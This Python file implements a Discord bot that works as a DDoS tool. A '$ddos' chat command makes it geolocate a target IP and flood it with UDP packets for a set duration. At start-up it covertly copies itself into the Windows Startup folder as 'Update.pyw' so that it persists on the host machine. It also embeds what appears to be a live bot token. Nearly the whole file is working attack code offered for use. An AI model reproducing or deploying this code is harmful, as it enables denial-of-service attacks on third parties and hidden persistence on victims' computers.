#
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⠶⠖⢛⣻⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡔⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣶⣋⣩⣤⠶⠾⣿⡁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣴⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⣠⣴⣾⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣷⣤⣀⣀⡤⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⢀⣠⣴⣶⡇⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⣠⣶⣿⣿⣿⣿⠃⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣾⣿⣿⣿⣿⣿⠃⢠⣿⣿⣿⠿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⡿⣫⣷⣾⣿⣿⣿⣿⣿⣿⣿⡏⠀⢠⣿⣿⣿⣿⣿⣿⣯⡻⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣫⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣞⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢪⣿⣿⢟⣽⣿⣿⡿⣫⣽⣿⣿⣿⣿⣿⡟⠀⠀⢠⣿⣿⣿⣿⣿⣿⣯⡻⣿⣿⣷⣝⠿⣿⣏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣫⣶⣿⣿⡿⣫⣾⣿⣿⣿⣿⣿⣿⣿⡁⡀⢠⣀⣿⣿⣿⣿⣿⣿⣿⣿⣮⡻⣿⣿⣷⣮⣃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⣿⣿⡿⠟⢭⣾⡿⣻⣿⣿⣿⣿⣿⣿⣿⡟⠁⠀⢹⣿⣿⣿⣿⣿⣿⣿⣯⣻⠿⠮⠙⠿⣿⣿⣿⣶⣤⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⣀⣤⣶⣿⡿⠿⠿⠿⢛⠋⠀⠀⠀⠐⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⢈⣿⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⠀⣀⣈⣙⣛⣛⣻⠿⠿⢿⣶⣤⣀⠀⠀⠀⠀
# ⠀⠀⢀⣴⣿⠟⠉⠀⣰⣾⣿⣿⣿⣿⣿⡿⣷⣦⡀⠈⠿⣿⣿⣿⣿⣿⣿⣏⠁⠀⠀⠀⢼⣿⣿⣿⣿⣿⣿⠛⠀⣠⣶⡿⣿⣿⣿⣿⣿⣿⣿⣆⠀⠀⠹⣿⣷⣄⠀⠀
# ⠀⣴⣿⡿⠋⠀⠀⠀⢿⣿⡿⣿⣿⣿⣿⣿⣮⣟⢿⣦⣴⣿⣿⣿⣿⣿⡏⠃⠀⠀⠀⠀⠘⢸⣿⣿⣿⣿⣿⣷⣾⠟⣫⣾⣿⣿⣿⣿⡿⣟⣿⡿⠀⠀⠀⠈⠻⣿⣧⡀
# ⢊⢼⠟⠀⠀⠀⠀⠀⠘⢿⣿⣮⣻⣿⣿⣿⣿⣿⣷⣽⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⢯⣾⣿⡿⠁⠀⠀⠀⠀⠀⠹⠗⠈
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⡹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢫⣿⣿⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⣷⡝⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⣣⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⣮⡻⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⣿⡿⣿⣿⣿⣿⣿⣿⡿⣫⣾⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡟⣿⣿⣶⣽⡛⠛⠛⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⠃⠀⠉⠉⠛⣫⣵⣿⣿⣿⢹⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡾⣵⣿⣿⡿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⠃⠀⠀⠀⠀⠀⢹⡿⠿⣿⣿⣷⣻⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠚⣛⣼⣿⣿⡟⠂⢸⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⠏⠀⠀⠀⠀⠀⠀⠀⠀⡇⠘⠹⣿⣿⣷⣍⣙⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠒⠛⠛⠛⠛⠋⠀⠀⠘⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢾⣇⠀⠀⠀⠀⠀⣀⣠⣤⠴⠗⠚⠛⠛⣯⠉⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⠷⠶⠖⠛⠋⠉⠁⣀⠀⢀⣀⣠⡴⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
# ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⠿⡍⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

import discord
import socket
import time
import os
import shutil
import sys
import requests

# ─────────────────────────── ･ ｡ﾟ☆: *.DDoS Part .* :☆ﾟ. ───────────────────────────

class DDoS:
    data = "L" * 1024
    
    def attack(ip, port, duration):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        start_time = time.time()
        end_time = start_time + duration
        
        while time.time() < end_time:
            sock.sendto(DDoS.data.encode(), (ip, port))
            print("Packet sent!")

# ─────────────────────────── ･ ｡ﾟ☆: *.Bot Part .* :☆ﾟ. ───────────────────────────

class Bot(discord.Client):
    async def on_ready(self):
        print("Copying file in startup files...")
        
        startup_path: str = os.path.join(os.getenv("APPDATA"), r"Microsoft/Windows/Start Menu/Programs/Startup")
        dest_path: str = os.path.join(startup_path, "Update.pyw")
        
        if not os.path.exists(dest_path):
            shutil.copyfile(sys.executable, dest_path)
        
        print("File copied! You can now DDoS as how many you want!")

    async def on_message(self, message):
        if message.author == self.user:
            return
    
        if message.content.startswith('tg'):
            await message.reply('Toi-même ! >:(')

        if message.content.startswith('$ddos'):
            splittedShit = message.content.split()
            ip           = splittedShit[1]
            port         = int(splittedShit[2])
            duration     = int(splittedShit[3])
            
            infos = requests.get("http://ip-api.com/json/" + ip).json()
            
            embed = discord.Embed(title=f"DDoS in progress... :tools:", color=0xFF0000)
            embed.add_field(name="IP", value=ip, inline=True)
            embed.add_field(name="Port", value=str(port), inline=True)
            embed.add_field(name="Duration", value=str(duration) + " seconds", inline=True)
            embed.add_field(name="Country", value=infos['country'], inline=True)
            embed.add_field(name="Region", value=infos['regionName'], inline=True)
            embed.add_field(name="City", value=infos['city'], inline=True)
            embed.add_field(name="ISP", value=infos['isp'], inline=True)
            msg = await message.reply(embed=embed)
            
            DDoS.attack(ip, port, duration)
            
            embed = discord.Embed(title=f"DDoS finished! :white_check_mark:", color=0x00ff00)
            embed.add_field(name="IP", value=ip, inline=True)
            embed.add_field(name="Port", value=str(port), inline=True)
            embed.add_field(name="Duration", value=str(duration) + " seconds", inline=True)
            embed.add_field(name="Country", value=infos['country'], inline=True)
            embed.add_field(name="Region", value=infos['regionName'], inline=True)
            embed.add_field(name="City", value=infos['city'], inline=True)
            embed.add_field(name="ISP", value=infos['isp'], inline=True)
            await msg.edit(embed=embed)

# ─────────────────────────── ･ ｡ﾟ☆: *.Final Part .* :☆ﾟ. ───────────────────────────

intents = discord.Intents.default()
intents.message_content = True

client = Bot(intents=intents)
client.run('MTA5MjE3NDI4MjI2NTc0MzM4MQ.GW_amA.MDn6jLQ5n5vS9OP5Y4GV15pqwienlGko0HWGG4')